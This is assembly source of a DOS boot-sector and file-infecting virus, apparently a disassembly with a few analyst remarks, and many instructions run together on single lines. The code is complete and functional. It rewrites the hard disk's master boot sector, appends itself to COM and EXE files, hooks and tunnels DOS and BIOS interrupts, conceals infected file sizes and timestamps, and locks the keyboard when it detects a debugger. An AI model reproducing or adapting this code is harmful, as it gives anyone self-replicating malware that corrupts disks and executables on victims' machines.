MOV AX, 0200h +( Virus_Size_512 - 1)MOV BX, 512+3MOV CX, 3INT 13h
MOV AL, 0E8h ; CALL xxxx opcode.XOR DI , DI ; A call to the entrypointCLD ; for file infections.STOSB
MOV AX, ( File_Entry - Boot_Loader )STOSW
MOV CX, ( 512 / 2) ; Copy virus bootsectorMOV SI , 7C00h ; too to virus segment.REP MOVSW
; Initialize some variables.
MOV ES: Ofs_Old_Int13h , OFFSET Old_Int13hMOV ES: Ofs_Real_Int13h , OFFSET Real_Int13hMOV ES: Origin , BootMOV ES: File_Handle , 0
MOV SI , OFFSET Hook_Ints
PUSH ES ; Relocated virus code.PUSH SI
MOV AX, OFFSET Boot_Int21hMOV SI , OFFSET Boot_LoaderMOV DI , OFFSET Old_Int08h
NOP
RETF ; Jump to relocated code.
EXE_Data :
EXE_SP DW 0EXE_SS DW 0EXE_IP DW 0EXE_CS DW 0
DB 'You can''t catch the Gingerbread Man!!'
File_Entry :XCHG BP, AX ; Save AX (FCB-status) in BP.
POP SI ; POP delta offset.
PUSH ES ; Save ES & DS (PSP).PUSH DS
PUSH CSPOP DS
MOV AX, 0EEE7h ; See if virus is alreadyINT 21h ; TSR.
CMP AX, 0D703h ; It is?JE JMP_Run_Host ; Then bail to host.
MOV ES, ES:[ 2Ch] ; Environment block.
CLDXOR DI , DI
Find_ComSpec : PUSH SI
; Scan for COMSPEC= to find the command interpreter .
ADD SI , ( ComSpec_String - Boot_Loader )MOV CX, 8REPE CMPSB
PUSHF
CALL Get_End_DI ; Go to the next setting.
POPFJE Save_ComSpec ; Yeah got it..
POP SI
JNE Find_ComSpec ; Repeat the search.
JMP_Run_Host : JMP Run_Host
DB 'Bad Seed - Made in OZ'
Save_ComSpec: PUSH DS ; Swap DS & ES.PUSH ESPOP DSPOP ES
XCHG SI , DI ; SI = end of path to command; interpreter.
STD ; SI = last byte of path toLODSW ; command interpreter.
MOV CX, SI ; Remember end offset.DEC CX ; Exclude the '\'.
ADD DI , 12 ; DI = end of ComSpec_Value.; *** Buffer is 1 byte too; small, now filenames with; 8 characters will fuck up.
Copy_ComSpec: LODSBSTOSB
CMP AL, '\' ; Copied entire filename?JNE Copy_ComSpec ; Otherwise just go on.
SUB CX, SI ; Get the size of the command; interpreter filename.
POP SI
PUSH CSPOP DS
; Keep it for later use.
MOV [ SI +( ComSpec_Length - Boot_Loader )], CL
MOV BYTE PTR [ SI +( Origin - Boot_Loader )], File
XOR AX, AX ; ES = IVT.MOV ES, AX
PUSH SI
; Copy the stealth code to an unused piece; of memory (only used during bootup).
ADD SI , ( File_Int21h - Boot_Loader )MOV DI , 600hMOV CX, ( End_Body - File_Int21h )CLDREP MOVSB
POP SI
MOV DS, CX ; DS = IVT.
; Patch appropriate offsets.
MOV DS: 600h +( Ofs_Old_Int13h - File_Int21h ), 600h +( Old_Int13h - File_Int21h )MOV DS: 600h +( Ofs_Real_Int13h - File_Int21h ), 600h +( Real_Int13h - File_Int21h )
MOV AX, 600h ; INT 21h ISR to hook up.
Hook_Ints : CLI
; Starting from a bootsector or file?
CMP BYTE PTR CS:[ SI +( Origin - Boot_Loader )], BootJNE Hook_Int21h
MOV AX, OFFSET New_Int08h ; Hook INT 08h.XCHG DS:[( 08h* 4)], AXSTOSW
MOV AX, CSXCHG DS:[( 08h* 4)+ 2], AXSTOSW
MOV DS:[( 21h* 4)+ 2], 0FFFFh ; Initialize DOS segment to; a dummy value so the virus; can determine when DOS has; been loaded.
STI
ADD DI , ( Old_Int13h -( Old_Int08h +4))JMP SHORTInit_Tunnel_13
Hook_Int21h : XCHG DS:[( 21h* 4)], AX ; Hook INT 21h.STOSW
XCHG BX, AX ; Save original INT 21h.
MOV AX, ESXCHG DS:[( 21h* 4)+ 2], AXSTOSW
XCHG BX, AX ; Store original INT 21hSTOSW ; another time.
XCHG BX, AXSTOSW
; Hook INT 01h for recursive tunneling.
LEA AX, CS:[ SI +( New_Int01h - Boot_Loader )]XCHG DS:[( 01h* 4)], AXSTOSW
MOV AX, CSXCHG DS:[( 01h* 4)+ 2], AXSTOSW
STI
Init_Tunnel_13 : CLC ; Save INT 13h, then tunnel; INT 13h.
PUSH ES
Save_Int13h : PUSH DS
LDS BX, DS:[( 13h* 4)] ; Get (tunneled) INT 13h.
MOV AX, BX ; Save (tunneled) INT 13h.STOSW
MOV AX, DSSTOSW
JC Pick_i13h_ISR ; Already tunneled INT 13h ?
PUSH DS ; ES:BX = INT 13h.POP ES
PUSHF ; Recursively tunnel INT 13hPUSH CS ; if origin is file, elseCALL Tunnel_Int13h ; just save INT 13h.
POP DSPOP ES
STC ; Set flag to only saveJC Save_Int13h ; INT 13h.
Pick_i13h_ISR : POP DS
PUSH SI
CMP BYTE PTR CS:[ SI +( Origin - Boot_Loader )], Boot
PUSHF
; Stealth ISR.
MOV SI , 600h +( Boot_Int13h - File_Int21h )
JNE Hook_Int13h
; Stealth/infection ISR.
MOV SI , OFFSET Boot_Int13h
Hook_Int13h : CLI ; Hook the virus up.MOV DS:[( 13h* 4)], SIMOV DS:[( 13h* 4)+ 2], ESSTI
POPF
POP SI
PUSH CSPOP DS
JE Run_Old_Boot ; Pass control to real BS.
; If running from a file then go infect the MBS.
PUSH ES
PUSH CSPOP ES
MOV AX, 0201h ; Read the MBS of HDD 1.LEA BX, CS:[ SI +( Buffer - Boot_Loader )]MOV CX, 1MOV DX, 80hINT 03h
POP ES
JNC Scan_Part_Tbl ; Go on if no error.
JMP SHORTSwap_Boot_ID ; Error, bail.
Scan_Part_Tbl : MOV CX, 4 ; Maximum of 4 partitions.MOV DI , 1BEh ; Start of partition info.
Find_Act_Part : TEST BYTE PTR [ BX+DI ], 80h ; It's the active partition?JNZ Chk_Partition
ADD DI , 16 ; Next partition.
LOOP Find_Act_Part ; Check all partitions.
Run_Host : POP DS ; Restore PSP.MOV DX, DS ; Save PSP in DX.
POP ES
; This host is of EXE-type?
CMP CS:[ SI +( Host_Header - Boot_Loader )], 'ZM'JE Restore_EXE
; Restore .COM-file in memory and execute it.
ADD SI , ( Host_Header - Boot_Loader )MOV DI , 100h
PUSH CS ; Push entrypoint of hostPUSH DI ; *** CS mod ain't needed.
MOVSB ; Restore first 3 bytes ofMOVSW ; the host.
XOR AX, AX ; Clear registers.XOR BX, BXXOR CX, CXXOR DX, DXXOR SI , SIXOR DI , DI
XCHG BP, AX ; Restore FCB status in AX.
RETF ; Jump to the host.
Run_Old_Boot :XOR CX, CX ; Zero ES.MOV ES, CX
MOV AX, 0201h ; Read the standard MS-DOSMOV BX, 7C00h ; bootsector.MOV CX, 1MOV DX, 0180h
INT 13h
PUSH ES ; And go execute it.PUSH BX
RETF
Restore_EXE : ADD DX, ( 100h / 16) ; Get effective segment.
; Update old CS & SS with it.
ADD CS:[ SI +( EXE_CS- Boot_Loader )], DXADD DX, CS:[ SI +( EXE_SS- Boot_Loader )]
; Restore host's original stack.
MOV SS, DXMOV SP, CS:[ SI +( EXE_SP- Boot_Loader )]
XCHG BP, AX ; Restore AX (FCB status).
; Jump to the host's original entrypoint.
JMP DWORDPTR CS:[ SI +( EXE_IP- Boot_Loader )]
Chk_Partition : INC DI ; Start of partition.
MOV ES:[ 600h +( Act_Partition - File_Int21h )], DIMOV DS:[ SI +( Act_Partition - Boot_Loader )], DI
MOV AX, 0200h ; Head 0, sector 2 (where; the virusbody is located).
CMP DS:[ BX+DI ], AX ; MBS is already infected?JE Run_Host ; Then just bail out.
MOV DS:[ BX+DI ], AX ; Point partition's boot-; sector to virusbody.
PUSH CSPOP DS
CLC ; No errors so far..
Swap_Boot_ID : MOV AX, 0AA55h ; Bootsector ID.
XCHG DS:[ SI +510 ], AX ; Swap-in bootsector ID.
PUSH AX ; Save original word.JC Chk_If_Unhook ; Error occurred?
; Save original word in virusbody.
MOV [ SI +( Original_Word - Boot_Loader )], AX
PUSH CSPOP ES
MOV AX, 0301h ; Write patched MBS backMOV CX, 1 ; to disk.MOV DX, 80hINT 03hJC Chk_If_Unhook
; Write the virusbody to the zero-track.
MOV AX, 0300h + ( Virus_Size_512 )MOV BX, SIMOV CX, 2INT 03h
Chk_If_Unhook : MOV AX, 0 ; Zero DS & ES (withoutMOV ES, AX ; changing any flags).MOV DS, AX
PUSH SI
CLDCLI
JNC Restore_Int03h ; Harddisk was succesfully; infected? If not, unhook; the INT 13h stealth.
MOV SI , 600h +( Old_Int13h - File_Int21h )MOV DI , ( 13h* 4)MOVSWMOVSW
Restore_Int03h : POP SIPUSH SI
PUSH CSPOP DS
; Restore INT 03h.
ADD SI , ( Old_Int03h - Boot_Loader )MOV DI , ( 03h* 4)MOVSWMOVSW
STI
POP SI
POP DS:[ SI +510 ] ; Restore original word.
JMP Run_Host
; Called with ES:BX as vector address of INT 13h.Tunnel_Int13h :
PUSHF
; Not necessary to tunnel from boot.
CMP BYTE PTR CS:[ SI +( Origin - Boot_Loader )], BootJE Push_CS_IP
POPF
MOV AX, 300h ; Flags, TF & IF enabled.PUSH AX
Push_CS_IP : PUSH ES ; Untunneled INT 13h.PUSH BX
MOV AH, 01h ; Get status byte.MOV DL, 80h ; 1st HDD.
New_Int01h : CLI
PUSH BP ; Setup a stack pointer.MOV BP, SP
PUSH BX ; Save scrap registers.PUSH AX
MOV BX, CS ; *** Not used.
MOV AX, [ BP+( 2* 2)] ; Get segment of next; instruction.
CMP AX, 70h ; In the DOS kernel?JA Exit_Int01h ; If not then get out.
PUSH DSPUSH ES
XOR BX, BX ; DS = IVT.MOV DS, BX
MOV DS:[( 13h* 4)+ 2], AX ; Set tunneled address in; IVT.
MOV BX, [ BP+( 1* 2)] ; And the IP..MOV DS:[( 13h* 4)], BX
PUSH DI
CALL Get_Delta_1
Old_Int03h DW 0, 0
Get_Delta_1 : POP DI ; POP delta offset.
PUSH CSPOP ES
CLD
XCHG BX, AX ; Revector the tunneledXCHG DS:[( 03h* 4)], AX ; INT 13h to INT 03h.STOSW
XCHG BX, AXXCHG DS:[( 03h* 4)+ 2], AXSTOSW
PUSH DS ; ES = IVT.POP ES
PUSH SI
; Unhook INT 01h.
MOV SI , 600h +( Old_Int01h - File_Int21h )MOV DI , ( 01h* 4)MOVSW
MOVSW
POP SI
POP DIPOP ESPOP DS
Exit_Int01h : POP AX ; Restore registers.POP BXPOP BP
STI ; *** Useless instruction.
IRET
ComSpec_String DB 'COMSPEC='ComSpec_Value DB 13 DUP ( 0)ComSpec_Length DW 0
New_Int08h :PUSH DSPUSH AX
XOR AX, AX ; DS = IVT.MOV DS, AX
CMP DS:[( 21h* 4)+ 2], 1000h ; DOS hasn't grabbed INT 21hJA Exit_Int08h ; yet? Then wait some more..
PUSH ESPUSH SIPUSH DI
PUSH CSPOP ES
MOV AX, CSMOV DI , OFFSET Old_Int21h +2NOP
STD ; Hook INT 21h.CLIXCHG AX, DS:[( 21h* 4)+ 2]STOSW
MOV AX, OFFSET Boot_Int21hXCHG AX, DS:[( 21h* 4)]STOSW
PUSH DS ; Swap DS & ES.PUSH ESPOP DSPOP ES
MOV SI , DI ; Unhook INT 08h.MOV DI , ( 08h* 4)+ 2MOVSWMOVSW
STI
POP DIPOP SIPOP ES
Exit_Int08h : POP AXPOP DS
JMP DWORDPTR CS: Old_Int08h
Boot_Int21h :PUSH DSPUSH AX
XOR AX, AX ; DS = IVT.MOV DS, AX
MOV AX, DS:[( 01h* 4)] ; Offset of INT 01h's ISR.
CMP AX, DS:[( 03h* 4)] ; Same as INT 03h's ?JNE Lock_Keyboard
MOV AX, DS:[( 01h* 4)+ 2] ; Segment of INT 01h's ISR.
CMP AX, DS:[( 03h* 4)+ 2] ; Same as INT 03h's ?JE Exit_No_Debug ; If INT 01h != INT 03h then
; a debugger is active.
Lock_Keyboard : MOV AL, 10000010b ; Disable keyboard & printer.OUT 21h , AL
Exit_No_Debug : POP AXPOP DS
Test_11h_12h : CMP AH, 11h ; Findfirst (FCB) ?JE Do_FCB_Stealth
CMP AH, 12h ; Findnext (FCB) ?JNE Check_4_Create
; This is the routine Rock Steady/NuKE used in his; FCB stealth tut, with one or two bytes changed.; The rest of the code also shows a certain influen ce; of the Rock Steady tuts.
Do_FCB_Stealth : CALL Do_Old_Int21h ; Do the filefind.
TEST AL, AL ; Error?JNZ IRET_FCB_St
PUSH ESPUSH AXPUSH BX
MOV AH, 51h ; Obtain current PSP.CALL Do_Old_Int21h
MOV ES, BX
CMP BX, ES:[ 16h ] ; Owner PSP == PSP ? (ie. isJNE Exit_FCB_St ; command interpreter?).
MOV BX, DXMOV AL, [ BX] ; Get first byte of FCB.
PUSH AX
MOV AH, 2Fh ; Obtain current DTA.CALL Do_Old_Int21h
POP AX
INC AL ; It's an extended FCB ?JNZ Test_Seconds
ADD BX, 7 ; Then skip extended stuff.
Test_Seconds : MOV AX, ES:[ BX.FCB_Time ] ; Grab time word.
AND AX, 0000000000011111b ; Mask out seconds value.
XOR AL, ( 60/ 2) ; 60 seconds? (infected?).JNZ Exit_FCB_St
; Set the seconds value in the DTA to 2.
AND BYTE PTR ES:[ BX.FCB_Time ], 11100000bOR BYTE PTR ES:[ BX.FCB_Time ], ( 2/ 2)
; Subtract the virussize from the filesize.
SUB ES:[ BX.FCB_Size ], Virus_SizeSBB ES:[ BX.FCB_Size +2], AX
Exit_FCB_St : POP BXPOP AXPOP ES
IRET_FCB_St : IRET
Check_4_Create : CMP AH, 3Ch ; Create/truncate file?JE Set_RW_BX ; Then save it's handle
; so it can be infected; on close.
CMP AH, 3Dh ; Open file?JE Set_RW_AL ; Go infect it.
CMP AH, 3Eh ; Close file?JNE Check_4_Read
JMP Infect_3E ; Infect it if it was; a newly created file.
Check_4_Read : CMP AH, 3Fh ; Read file?JE J_Go_Chk_Secs ; Stealth the read.
CMP AH, 40h ; Write file?JE J_Go_Chk_Secs ; Disinfect the file.
CMP AH, 42h ; Seek file?JNE Check_4_Exec
CMP AL, 02h ; Seek EOF relative?JB J1_J_Old_i21h
J_Go_Chk_Secs : JMP Go_Check_Secs ; Stealth stuff.
Check_4_Exec : CMP AH, 4Bh ; Execute/load file?JNE Check_4_Exit
CMP AL, 02h ; It's either 4B00h or 4B01h?JB CALL_Do_Infect ; Else don't infect.
JMP SHORTJ1_J_Old_i21h
Set_RW_AL: CMP CS: Windows_Active , 1 ; Is Windoze running? ThenJE J1_J_Old_i21h ; don't do anything.
CMP AX, 3D01h ; Open file, write-only?JNE CALL_Do_Infect
INC AL ; Then change access mode to; read/write so the virus; can read from it when it; wants to disinfect it.
CALL_Do_Infect : CALL Do_Infect ; Infect it.
J1_J_Old_i21h : JMP JMP_Old_Int21h
Check_4_Exit : CMP AH, 4Ch ; Program terminate?JNE Check_4_Date_T
JMP Check_Win_Exit ; Go check if it's Windoze.
Check_4_Date_T : CMP AH, 57h ; Get/set file date & time?JNE Chk_4_Create_N
JMP Stealth_Seconds ; Don't let em fuck with the; seconds.
Chk_4_Create_N : CMP AH, 5Bh ; Create new file?JE Set_RW_BX ; Save it's handle for later.
CMP AX, 6C00h ; Extended open/create?JNE Chk_4_Res_Chk
Set_RW_BX: CMP CS: Windows_Active , 1 ; Is Windoze up and running?JE J1_J_Old_i21h ; Then abort any infection.
PUSH BXPUSH DX
CMP AX, 6C00h ; Don't infect on create.JNE Save_Handle
OR BL, 00000010b ; Change access mode toAND BL, 11111110b ; read/write.
MOV DX, SI ; DX = offset filepath.CALL Do_Infect
Save_Handle : PUSH BXPUSH ESPUSH AXPUSH CXPUSH SI
PUSH DI
PUSH DSPOP ES
CALL Get_End_DX ; Go to end of path.
STDMOV SI , DI
LODSB ; SI = last word extension.LODSW
CALL Check_Extension ; .COM/EXE extension?
MOV CS: Valid_Handle , CL ; Mark handle as invalid (0).
JNE Do_Open_Create
INC CX ; Mark handle as valid (1).MOV CS: Valid_Handle , CL
Do_Open_Create : POP DIPOP SIPOP CXPOP AXPOP ESPOP BXPOP DX
PUSH AX
CALL Do_Old_Int21h ; Do the open/create call.JC Clear_Inf_Hand
INC SP ; Remove the top word onINC SP ; the stack.
XCHG BX, AX ; Save the new filehandle.
PUSH CXPUSH DX
MOV AX, 5700h ; Get file's date & time.CALL Do_Old_Int21h
CALL Check_60_Secs ; It's infected?
POP DXPOP CX
XCHG BX, AX
JNE Save_Inf_Hand
MOV CS: Valid_Handle , AL ; Mark handle as valid (> 0).
Save_Inf_Hand : MOV CS: File_Handle , AL ; Save this filehandle.POP BX
JMP IRET_Flags
Clear_Inf_Hand : MOV CS: Valid_Handle , 0 ; Reset handle-valid boolean.POP AX
POP BXJMP JMP_Old_Int21h
Chk_4_Res_Chk : CMP AX, 0EEE7h ; It's the virus' TSR check?JE Return_ID_1
JMP JMP_Old_Int21h
Return_ID_1 : MOV AH, 0D7h ; Return ID in AX and return.
New_Int24h : MOV AL, 03h ; Fail silently.IRET
Get_End_DX:MOV DI , DX
Get_End_DI : XOR AL, AL ; Scan to the end of theMOV CL, 128 ; filepath.CLDREPNZ SCASB
RETN
Do_Infect :PUSH ESPUSH BXPUSH CXPUSH SIPUSH DIPUSH DSPUSH DX
PUSH DSPOP ES
PUSH AX
CALL Get_End_DX
DEC DI ; DI = last byte of filename.DEC DI
PUSH CSPOP DS
MOV CX, ComSpec_LengthMOV SI , OFFSET ComSpec_String +8+12STD
PUSH DI
Comp_ComSpec: LODSB ; Save ComSpec byte in AH.MOV AH, AL
XCHG SI , DI
LODS BYTE PTR ES:[ SI ] ; Fetch byte from filename.
XCHG SI , DI
AND AX, 5F5Fh ; Convert word to uppercase.
CMP AH, AL ; Bytes match?JNE Go_Check_Ext ; If not it's not ComSpec.
LOOP Comp_ComSpec
POP DI ; If it get's to here, the; file is the COMSPEC, and
JMP Exit_Infect ; infection is denied.
; Returns ZF if file has COM/EXE extension.Check_Extension :
MOV CX, 2
Get_Extension : LODS WORDPTR ES:[ SI ]
AND AX, 5F5Fh ; Uppercase.
XCHG BX, AX
LOOP Get_Extension
CMP AX, 'MO'JNE Check_For_EXE
CMP BX, 'C.' AND 5F5Fh
RETN
Check_For_EXE : CMP AX, 'EX'JNE Exit_Check_Ext
CMP BX, 'E.' AND 5F5Fh
Exit_Check_Ext : RETN
Go_Check_Ext : POP SI ; SI = last byte of filename.DEC SI ; SI = last word of filename.
POP AX ; AX on entry.PUSH AX
CMP AX, 4B00h ; Program execute?PUSHF
CALL Check_Extension ; File has COM/EXE extension?JE Go_Chk_Win_Act
POPFJE Find_File_Name
JMP Exit_Infect
DB 'CHKDSK' , 0Windows_Active = BYTE PTR $- 1
DB 'MEM'Mem_String = $- 1
Go_Chk_Win_Act : POPFJNE Check_Windows
Find_File_Name : INC SI ; DI = byte before dot.
MOV DI , SI
INC SI ; SI = extension dot.
MOV CX, SI ; Calculate path length.SUB CX, DX
XCHG SI , DI
Chk_Start_Name : LODS BYTE PTR ES:[ SI ] ; Fetch a byte from path.
CMP AL, '\' ; Path seperator? Then startJE Get_Start_Name ; of filename is found.
LOOP Chk_Start_Name
JNE Chk_File_Name
Get_Start_Name : INC SI ; SI = start of filename.INC SI
MOV DX, SI
Chk_File_Name : MOV CX, DI ; Calculate length ofSUB CX, DX ; filename without extension.
DEC DI ; DI = last byte of filename.MOV SI , OFFSET Mem_String
CMP CX, 3 ; Can it be 'MEM' ?JE Compare_Byte
LODSW ; SI = 'CHKDSK' string.LODSW
CMP CX, 6 ; Can it be 'CHKDSK' ?JNE Check_Windows
Compare_Byte : LODSB ; Fetch byte of filename andMOV AH, AL ; save it in AH.
XCHG SI , DI
LODS BYTE PTR ES:[ SI ] ; Fetch byte of match string.
AND AX, 5F5Fh ; Convert to uppercase.
CMP AH, AL ; Bytes are the same?JNE Check_4_Win ; If not, skip this shit.
XCHG SI , DI
LOOP Compare_Byte
; Now that either MEM or CHKDSK are about to be exe cuted, the; virus will temporarily hook INT 12h to stealth th e total; amount of DOS memory available, which these progr ams will; display.
MOV AX, OFFSET New_Int12hMOV DI , OFFSET Old_Int12h
NOP
MOV DS, CX ; DS = IVT.
PUSH CSPOP ES
CLDCLI
XCHG DS:[( 12h* 4)], AX ; Save & hook INT 12h.STOSW
MOV AX, CSXCHG DS:[( 12h* 4)+ 2], AXSTOSW
STIJMP SHORTCheck_Windows
Check_4_Win : CMP CX, 3 ; Can it be 'WIN.COM' ?JNE Check_Windows
CMP AL, 'N' ; (WI)N ?JNE Check_Windows
DEC SI ; SI = 1st word of filename.LODS WORDPTR ES:[ SI ]
AND AX, 5F5Fh ; Uppercase.
CMP AX, 'IW' ; So it's WIN.COM ?JNE Check_Windows
MOV Windows_Active , 1 ; Set Windoze-active flag.
Check_Windows : CMP CS: Windows_Active , 1 ; Don't infect under Windoze.JE Exit_Infect
CLI
XOR CX, CX ; DS = IVT.MOV DS, CX
LES BX, DS:[( 24h* 4)] ; Save original INT 24h.PUSH ESPUSH BX
; Install own dummy critical-error handler.
MOV DS:[( 24h* 4)], OFFSET New_Int24hMOV DS:[( 24h* 4)+ 2], CS
STI
PUSH DS
PUSH BP ; Setup stackframe.MOV BP, SP
LDS DX, [ BP+( 5* 2)] ; DS:DX = path of file.
POP BP
PUSH DS
PUSH DX
MOV AX, 4300h ; Get file's attributes.CALL Do_Old_Int21h
PUSH CXJC Restore_Attr
TEST CL, 00000001b ; Readonly bit set?JZ Open_File
DEC CX ; Remove readonly bit.
MOV AX, 4301h ; Set new attributes.CALL Do_Old_Int21h
Open_File : MOV AX, 3D02h ; Open target file for r/w.CALL Do_Old_Int21hJC Restore_Attr
XCHG BX, AX ; Save filehandle in BX.
MOV AX, 5700h ; Get file date & time.CALL Do_Old_Int21hJC Close_File
CALL Check_60_Secs ; Already infected?JE Close_File
PUSH CX ; Save original filedate &PUSH DX ; time with 60 seconds set.
CALL Infect_Handle ; Infect the handle.
POP DXPOP CX
JC Close_File ; Error occurred?
MOV AX, 5701h ; Restore file date & timeCALL Do_Old_Int21h ; with 60 seconds.
Close_File : MOV AH, 3Eh ; Close the file.CALL Do_Old_Int21h
Restore_Attr : POP CX ; File path & attributes.POP DXPOP DS
JC Restore_Int24h ; Error occurred?
TEST CL, 00000001b ; Need to restore theJZ Restore_Int24h ; readonly flag?
MOV AX, 4301h ; Fix file-attributes.CALL Do_Old_Int21h
Restore_Int24h : POP DSPOP BXPOP AX
MOV DS:[( 24h* 4)], BX ; Restore INT 24h.MOV DS:[( 24h* 4)+ 2], AX
Exit_Infect : POP AXPOP DXPOP DSPOP DIPOP SIPOP CXPOP BXPOP ES
RETN
Infect_Handle :PUSH CSPOP DS
MOV DX, OFFSET Buffer ; Read file's header.NOP
MOV CX, 24MOV AH, 3FhCALL Do_Old_Int21h
SUB CX, AX ; All bytes were read?JNZ Error_Exit_Inf
PUSH DS ; ES = CS.POP ES
XCHG CX, AX ; CX = 24.
MOV SI , DX ; Save a copy of the originalMOV DI , OFFSET Host_Header ; header.CLDREP MOVSB
MOV DI , DX ; DX = header.MOV SI , OFFSET EXE_Data
; Save host's original SS:SP.
LES AX, DWORDPTR [ DI.Program_SS ]
MOV [ SI +( EXE_SP- EXE_Data )], ESMOV [ SI +( EXE_SS- EXE_Data )], AX
; Save host's original CS:IP.
LES AX, DWORDPTR [ DI.Program_IP ]
MOV [ SI +( EXE_IP- EXE_Data )], AXMOV [ SI +( EXE_CS- EXE_Data )], ES
MOV Host_Type , CL ; Initialize file as .EXE.
MOV AX, 'MZ' ; EXE marker.
CMP AX, [ DI.EXE_ID ] ; .EXE-ID is 'ZM' ?XCHG AH, AL ; Change .EXE-ID to 'MZ'.JNE Check_For_MZ
MOV [ DI.EXE_ID ], AX ; Set .EXE-ID to 'MZ'.
Check_For_MZ : CMP AX, [ DI.EXE_ID ] ; 'MZ' .EXE-file?
JE Save_File_Size
INC Host_Type ; Mark as .COM-file.
Save_File_Size : MOV AX, 4202h ; Seek to EOF.MOV DX, CXCALL Do_Old_Int21hJC Exit_Inf_Hand
; Remember size of host for later use.
MOV [ DI +( Host_Size - Buffer )], AXMOV [ DI +( Host_Size - Buffer )+ 2], DX
CMP Host_Type , EXE ; File is .EXE-type? ThenJE Check_Header ; size check ain't needed.
CMP AX,-( Virus_Size +264h ) ; .COM-file ain't too big?JB Append_Body
Error_Exit_Inf : STC ; Else mark error.
Exit_Inf_Hand : RETN
Check_Header : PUSH DI
MOV CX, 9
MOV SI , [ DI.File_512_Pages ] ; Filesize in 512-byte pages.DEC SI ; Undo 512-byte round.
XOR DI , DI ; DI:SI = imagesize.
Mul_512 : SHL SI , 1 ; Calculate imagesize inRCL DI , 1 ; DI:SI.LOOP Mul_512
CMP DX, DI ; High word doesn't match?POP DI
JNE Error_Exit_Inf ; Then it's an overlay.
ADD SI , [ DI.Image_Mod_512 ] ; Image size remainder.
; Low word of filesize doesn't match?
CMP SI , [ DI +( Host_Size - Buffer )]JNE Error_Exit_Inf
CMP AX, Virus_Size ; .EXE can't be smaller thanSBB DX, 0 ; the virus itself.JC Exit_Inf_Hand
XOR DX, DX
CMP DX, [ DI.Max_Size_Mem ] ; Can't have a NULL maximumJE Error_Exit_Inf ; memory requirement.
Append_Body : MOV CX, Virus_Size ; Append virusbody to file.MOV AH, 40hCALL Do_Old_Int21hJC Exit_Inf_Hand
SUB CX, AX ; Were all bytes written?
JNZ Error_Exit_Inf ; Else mark as failure.
MOV DX, CX ; *** DX is already zero.
MOV AX, 4200h ; Seek to BOF.CALL Do_Old_Int21hJC Exit_Inf_Hand
MOV AX, [ DI +( Host_Size - Buffer )]
CMP Host_Type , COMJE Infect_COM
Infect_EXE : MOV DX, [ DI +( Host_Size - Buffer )+ 2]
MOV CX, 4PUSH DI
MOV SI , [ DI.Header_Size ]XOR DI , DI
Mul_16 : SHL SI , 1 ; Calculate headersize.RCL DI , 1LOOP Mul_16
SUB AX, SI ; Calculate imagesize.SBB DX, DI
POP DI
MOV CL, 12 ; 64k's DIV 4096 to get theSHL DX, CL ; new CS.
MOV [ DI.Program_IP ], AXMOV [ DI.Program_CS ], DX
ADD DX, 3408 / 16 ; Set new stack.
MOV [ DI.Program_SP ], AXMOV [ DI.Program_SS ], DX
ADD [ DI.Min_Size_Mem ], 448 / 16MOV AX, [ DI.Min_Size_Mem ]
CMP AX, [ DI.Max_Size_Mem ] ; MaxMemSize must be atleastJB Calc_New_Img_S ; MinMemSize.
MOV [ DI.Max_Size_Mem ], AX ; MaxMemSize == MinMemSize.
Calc_New_Img_S : MOV AX, [ DI.Image_Mod_512 ]ADD AX, Virus_Size
PUSH AX
AND AH, 1 ; AX modulo 512.
MOV [ DI.Image_Mod_512 ], AXPOP AX
MOV CL, 9 ; AX DIV 512.SHR AX, CL
ADD [ DI.File_512_Pages ], AXMOV DX, OFFSET Buffer
NOP
MOV CX, 24 ; Write 24 bytes (MZ-header).JMP SHORTWrite_Header
Infect_COM : MOV DX, OFFSET BufferNOP
MOV DI , DXMOV BYTE PTR [ DI ], 0E9h ; JMP xxxx.
INC DISUB AX, 3 ; Calculate displacement.
PUSH DSPOP ES
CLD ; Store JMP displacement.STOSW
MOV CX, 3 ; Write 3 bytes (JMP_Virus).
Write_Header : MOV AH, 40h ; Write modified header.CALL Do_Old_Int21hJC Bad_Exit
CMP AX, CX ; All bytes were written?JE Good_Exit
Bad_Exit : STC
Good_Exit : RETN
; Infect the handle of a newly created file when it is closed.Infect_3E :
CMP CS: File_Handle , BL ; They're closing our handle?JNE Go_Close_Hnd
CMP CS: Valid_Handle , 1 ; Does File_Handle containJNE Go_Close_Hnd ; a valid filehandle at all?
DEC CS: Valid_Handle ; Reset the filehandle (0).
PUSH DSPUSH ESPUSH AXPUSH BXPUSH CXPUSH DXPUSH SIPUSH DI
MOV AX, 4200h ; Seek to file's header.XOR CX, CXXOR DX, DXCALL Do_Old_Int21h
CALL Infect_Handle ; Go infect the file.JC Exit_Infect_3E
MOV AX, 5700hCALL Do_Old_Int21h
INC AL ; *** Not used.
OR CL, ( 62/ 2) ; Set 60 seconds.DEC CX
MOV AX, 5701hCALL Do_Old_Int21h
Exit_Infect_3E : POP DIPOP SIPOP DXPOP CXPOP BXPOP AXPOP ESPOP DS
Go_Close_Hnd : CALL Do_Old_Int21h
JMP IRET_Flags
Go_Check_Secs :PUSH ESPUSH AXPUSH BXPUSH CXPUSH DXPUSH SIPUSH DI
MOV AX, 5700hCALL Do_Old_Int21h
OR AL, AL ; *** This seems fucked, CFJC Exit_Go_Chk_Se ; is always cleared after OR.
CALL Check_60_Secs
Exit_Go_Chk_Se : POP DIPOP SIPOP DXPOP CXPOP BXPOP AXPOP ES
JE Stealth_Handle
JMP JMP_Old_Int21h
Check_60_Secs :MOV AL, CL
OR CL, ( 62/ 2) ; Set 60 seconds.DEC CX
XOR AL, CL
RETN
Stealth_Handle :PUSH DS
PUSH DX
PUSH CXPUSH AX
PUSH CSPOP DS
MOV Read_Count , CX ; Save CX for later use.
XOR CX, CX
MOV New_Read_Count , CX
MOV AX, 4201h ; Get current file position.XOR DX, DXCALL Do_Old_Int21h
MOV File_Pos , AX ; Save it for later.MOV File_Pos +2, DX
MOV AX, 4202h ; Get filesize.XOR DX, DXCALL Do_Old_Int21h
SUB AX, Virus_Size ; Get original filesize.SBB DX, 0
MOV Orig_Size , AX ; Save it.MOV Orig_Size +2, DX
POP AX
CMP AH, 42h ; It is a seek EOF relative?JNE Rest_File_Pos
POP CX ; CX:DX = EOF displacement.POP DX
POP DS
PUSH CX
SUB DX, Virus_Size ; Do the seek relative toSBB CX, 0 ; the clean filesize insteadCALL Do_Old_Int21h ; of the infected size.
POP CX
JMP IRET_Flags
JMP_Cln_Handle : JMP Clean_Handle
Rest_File_Pos : PUSH AX
MOV AX, 4200h ; Restore original position.MOV DX, File_PosMOV CX, File_Pos +2CALL Do_Old_Int21h
